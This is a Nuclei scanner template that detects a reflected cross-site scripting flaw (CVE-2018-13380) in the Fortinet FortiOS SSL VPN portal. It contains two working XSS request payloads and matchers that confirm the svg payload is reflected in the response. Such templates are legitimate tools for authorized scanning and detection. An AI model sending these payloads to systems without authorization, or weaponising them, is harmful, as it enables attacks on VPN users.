nuclei-templates/cves/2018/CVE-2018-13380.yaml

38 lines
1.1 KiB
YAML

id: CVE-2018-13380
info:
name: Fortinet FortiOS Cross-Site Scripting
author: shelld3v
severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss,fortinet
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-13380
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body
- type: word
words:
- "application/json"
part: header
negative: true
- type: status
status:
- 200